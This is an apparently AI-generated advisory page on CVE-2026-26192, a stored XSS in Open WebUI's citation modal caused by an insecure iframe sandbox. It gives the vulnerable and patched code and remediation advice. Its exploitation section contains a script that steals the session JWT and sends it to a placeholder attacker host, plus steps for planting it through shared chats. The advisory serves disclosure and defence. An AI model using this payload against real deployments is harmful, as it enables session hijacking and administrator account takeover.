CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26192

CVE-2026-26192: Stored Cross-Site Scripting via Insecure Iframe Sandbox in Open WebUI

Amit Schendel
Amit Schendel
Senior Security Researcher

Jul 7, 2026·6 min read·4 visits

Executive Summary (TL;DR)

A Stored XSS vulnerability in Open WebUI (pre-0.7.0) allows low-privileged users to hijack administrator sessions via manipulated chat history citations rendered inside an insecurely sandboxed iframe.

CVE-2026-26192 is a high-severity Stored Cross-Site Scripting (XSS) vulnerability in Open WebUI prior to version 0.7.0. Authenticated users can modify chat history metadata to force document citations to render inside an HTML iframe configured with an insecure sandbox policy. By combining 'allow-scripts' and 'allow-same-origin', the sandbox boundary is neutralized. This allows scripts executing within the iframe to access the parent window's DOM, extract sensitive Web UI local storage keys (such as authentication JWTs), and perform state-changing actions on behalf of other users, including administrators.

Vulnerability Overview

Open WebUI is a self-hosted, offline-capable interface designed to facilitate interactions with artificial intelligence models. To enhance response clarity, the platform supports document ingestion and displays corresponding citations. When users request details on retrieved document segments, the interface previews these segments via Svelte frontend components.

To display HTML documents correctly, the application switches its rendering block from a standard plaintext container to an HTML iframe if the document's metadata marks it as containing HTML. This choice of component was intended to isolate untrusted content, but the isolation parameters applied to the iframe were misconfigured.

The vulnerability is classified under CWE-79 as Stored Cross-Site Scripting (XSS). The vulnerability triggers when a victim views a manipulated chat sequence, such as a session published via the platform's 'Shared Chats' feature. Because Open WebUI stores JWT session tokens directly in client-side storage, exploitation of this vulnerability leads to session hijacking and administrative compromise.

Root Cause Analysis

The root cause of CVE-2026-26192 resides in an insecure sandboxing configuration in the Svelte frontend component CitationModal.svelte. When displaying HTML documents, the modal applied the sandbox attribute using three directives: allow-scripts, allow-forms, and allow-same-origin. This combination is a well-known web security anti-pattern.

The sandbox attribute restricts what actions an embedded frame can take. The allow-scripts directive permits JavaScript execution inside the iframe. The allow-same-origin directive instructs the browser to treat the iframe content as sharing the same origin (protocol, host, and port) as the hosting parent application.

When allow-scripts and allow-same-origin are combined on an iframe served from the same host, the browser-enforced origin boundary is neutralized. Because the iframe runs on the same origin, its executing JavaScript possesses read and write permissions to the parent window's DOM. An attacker can use properties like window.parent to traverse the DOM tree, access the parent's localStorage, extract active session cookies, or trigger state-changing HTTP requests on behalf of the user.

Code-Level Analysis

To understand the vulnerable control flow, we inspect src/lib/components/chat/Messages/Citations/CitationModal.svelte prior to version 0.7.0. The rendering block evaluated the document.metadata?.html condition to choose the display mechanism.

<!-- Vulnerable Code Implementation -->
{#if document.metadata?.html}
	<iframe
		class="w-full border-0 h-auto rounded-none"
		sandbox="allow-scripts allow-forms allow-same-origin"
		srcdoc={document.document}
		title={$i18n.t('Content')}
	></iframe>
{:else}
	<pre class="text-sm dark:text-gray-400 whitespace-pre-line">{document.document
			.trim()
			.replace(/\n\n+/g, '\n\n')}</pre>
{/if}

The patch implemented in version 0.7.0 (commit 6adde203cd292a9e3af9c64a2ae36b603fed096a) removes the static declaration of the allow-same-origin directive. It introduces a configurable toggle controlled by application settings, defaulting to false.

<!-- Patched Code Implementation -->
<iframe
	class="w-full border-0 h-auto rounded-none"
	sandbox="allow-scripts allow-forms{($settings?.iframeSandboxAllowSameOrigin ?? false) ? ' allow-same-origin' : ''}"
	srcdoc={document.document}
	title={$i18n.t('Content')}
></iframe>

By default, the resulting sandbox value resolves to allow-scripts allow-forms. Because allow-same-origin is omitted, the browser isolates the iframe into a unique, null origin. Any attempt by JavaScript inside the iframe to interact with window.parent or access shared state throws a browser-enforced security exception, preventing execution against the parent context.

Exploitation Methodology

The exploitation process requires two key phases: injecting the malicious payload into the application state, and enticing an authenticated user to view the affected citation. An authenticated low-privilege attacker can manually modify their own chat history. By sending a crafted payload to the chat update endpoints (e.g., /api/v1/chats/), the attacker manipulates the JSON payload to include document citations with custom metadata.

The injected citation structure contains the metadata object with "html": true, and sets the document field to contain the weaponized script. The script is structured to search the parent context for the Web UI authentication JWT.

<script>
    // Access parent context localStorage to extract authentication token
    try {
        const token = window.parent.localStorage.getItem('token');
        if (token) {
            // Exfiltrate the token to an external destination
            navigator.sendBeacon('https://attacker-controlled.com/exfil?t=' + encodeURIComponent(token));
        }
    } catch (e) {
        // Suppress errors to avoid raising suspicion
    }
</script>

Once the payload is stored, the attacker uses Open WebUI's 'Shared Chats' feature to generate a public link. When another user or an administrator opens the shared link and triggers the citation preview, the application renders the Svelte component. The browser loads the document field into the iframe's srcdoc attribute, immediately executing the JavaScript payload within the victim's session.

Impact Assessment

The impact of CVE-2026-26192 is high due to the nature of the application's authentication model. Open WebUI stores critical session data, including JWT tokens, in the client's localStorage space. Because the vulnerable iframe is treated as sharing the same origin, the executing code can access this space directly.

With a retrieved authentication token, an attacker can gain full access to the victim's account. If the victim has administrative privileges, the attacker can use the Web UI APIs to perform administrative tasks, such as creating new admin accounts, reading private documents, altering system prompts, or modifying models.

The CVSS score of 7.3 reflects the requirement of user interaction (the victim clicking or opening the citation modal). However, because sharing chats is a primary functional flow in collaborative AI platforms, the barrier to user interaction is exceptionally low. The scope remains unchanged (U) because the execution stays within the boundary of the same web origin, but the potential confidentiality and integrity compromise is complete (H/H).

Remediation and Hardening

The primary remediation path is upgrading Open WebUI to version 0.7.0 or later. This upgrade ensures that the unsafe allow-same-origin directive is removed from the default iframe sandboxing policy. If immediate upgrading is not feasible, administrators should advise users to avoid opening citation modals in shared chats from unverified or untrusted users.

For depth-of-defense hardening, organizations should implement Content Security Policy (CSP) headers at the web server layer (such as Nginx or Traefik reverse proxies). A strong CSP can limit the impact of XSS by restricting where scripts can be loaded from and where data can be exfiltrated.

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src 'self' https://safe-api.domain;

In subsequent code iterations, the development team has also integrated dynamic CSP injection via the injectCsp helper directly into the srcdoc context of the iframe. This technique limits execution profiles inside the sandboxed document even if the sandbox properties are altered. Administrators should verify that the iframeSandboxAllowSameOrigin parameter is set to false in their global settings panel.

Official Patches

open-webuiGHSA security advisory and mitigation details
open-webuiPatched component source code for version 0.7.0

Technical Appendix

CVSS Score
7.3/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
EPSS Probability
0.19%
Top 91% most exploited

Affected Systems

Open WebUI prior to version 0.7.0

Affected Versions Detail

Product
Affected Versions
Fixed Version
open-webui
open-webui
< 0.7.00.7.0
AttributeDetail
CWE IDCWE-79
Attack VectorNetwork (AV:N)
CVSS Score7.3 (High)
EPSS Score0.00194
Exploit StatusProof of Concept (PoC) available
KEV StatusNot listed on CISA KEV

MITRE ATT&CK Mapping

T1189Drive-by Compromise
Initial Access
T1185Browser Session Hijacking
Collection
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The application does not neutralize or incorrectly neutralizes user-controlled input before it is placed in output that is used as a web page that is served to other users.

Known Exploits & Detection

GitHub Security AdvisoryTechnical writeup detailing stored XSS via iframe configurations inside Open WebUI citations modal.

Vulnerability Timeline

Refactoring starts in open-webui codebase
2025-12-22
GitHub Advisory GHSA-xc8p-9rr6-97r2 published
2026-02-19
CVE-2026-26192 assigned
2026-02-19
Open WebUI version 0.7.0 released with patch
2026-02-19

References & Sources

  • [1]GitHub Security Advisory GHSA-xc8p-9rr6-97r2
  • [2]Vulnerable Component File Source
  • [3]Raw Svelte Component (Before Patch)
  • [4]Raw Svelte Component (After Patch / v0.7.0)
  • [5]CVE Registry Record

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•37 minutes ago•CVE-2025-46571
5.4

CVE-2025-46571: Stored Cross-Site Scripting (XSS) in Open WebUI

Open WebUI versions prior to 0.6.6 contain a stored cross-site scripting (XSS) vulnerability that allows low-privileged users to upload malicious HTML files containing arbitrary JavaScript. When viewed by an administrator, the executed script can abuse administrative APIs to register malicious functions, leading to remote code execution on the underlying server host.

Amit Schendel
Amit Schendel
1 views•6 min read
•about 1 hour ago•CVE-2025-46719
7.4

CVE-2025-46719: Stored XSS and Administrative RCE in Open WebUI

A critical Stored Cross-Site Scripting (XSS) vulnerability exists in Open WebUI versions prior to 0.6.6. The vulnerability resides in client-side Markdown rendering, where unvalidated iframe tags containing local API base URLs bypass DOMPurify sanitization. This flaw allows authenticated attackers to steal user session tokens. If an administrative session is compromised, the attacker can leverage the application's native Python execution capabilities ('Functions') to achieve arbitrary Remote Code Execution (RCE) on the hosting server.

Alon Barad
Alon Barad
3 views•6 min read
•about 2 hours ago•CVE-2026-26193
7.3

CVE-2026-26193: Stored XSS via iFrame Embeds in Open WebUI Response Messages

CVE-2026-26193 is a stored Cross-Site Scripting (XSS) vulnerability in Open WebUI prior to version 0.6.44. The vulnerability arises because the rendering engine hardcodes insecure sandbox options on an iframe component used for response embeds, allowing attackers to execute JavaScript in the parent window origin.

Amit Schendel
Amit Schendel
2 views•7 min read
•about 3 hours ago•CVE-2026-34225
4.3

CVE-2026-34225: Blind Server-Side Request Forgery in Open WebUI Image Edit Endpoint

Open WebUI versions 0.7.2 and below contain a blind Server-Side Request Forgery (SSRF) vulnerability. The flaw exists within the image editing router, specifically inside the /api/v1/images/edit endpoint. An authenticated attacker with low privileges can exploit this endpoint to initiate asynchronous HTTP GET requests to local, private, or internal network services, mapping system resources and bypassing boundary restrictions.

Amit Schendel
Amit Schendel
4 views•6 min read
•about 17 hours ago•GHSA-VJC7-JRH9-9J86
10.0

Unauthenticated CRUD and Sensitive Data Exposure in 9Router API Endpoints

An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.

Amit Schendel
Amit Schendel
10 views•5 min read
•about 18 hours ago•CVE-2026-55790
7.4

CVE-2026-55790: DOM-Based Cross-Site Scripting in Craft CMS Support Widget

A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.

Alon Barad
Alon Barad
8 views•7 min read